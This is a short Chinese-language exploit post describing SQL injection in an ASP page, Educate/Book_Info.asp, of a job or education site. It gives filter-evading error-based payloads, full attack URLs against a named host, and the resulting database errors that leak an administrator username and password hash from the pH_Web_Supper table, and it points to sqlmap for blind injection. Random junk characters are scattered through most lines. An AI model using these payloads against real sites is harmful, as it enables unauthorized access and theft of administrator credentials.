漏洞出现在Educate/Book_Info.asp+ b3 f: K: | X* e
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出7 X1 m& F3 Y) W& ~6 m
exp:如下
9 y8 \, i( B) J查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)' L( S* C0 t8 x4 D
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
! Z8 k& _( x, d; ]* ?& C. R) \http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
5 Z C8 T$ H' @/ n6 S6 YMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'% u# N$ W$ I3 n! b% ]) `0 Y2 Z
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。( P2 @1 F+ _) B0 z( V' y& P1 c7 j
/Educate/Book_Info.asp,行 81 M& R% d1 ?3 O3 @
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
# A7 V; ] y- @. e, I, n) V& oMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'9 y6 @1 ~1 b6 `; F& W; U
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
+ w5 u2 G( C3 j0 y j/Educate/Book_Info.asp,行 8 |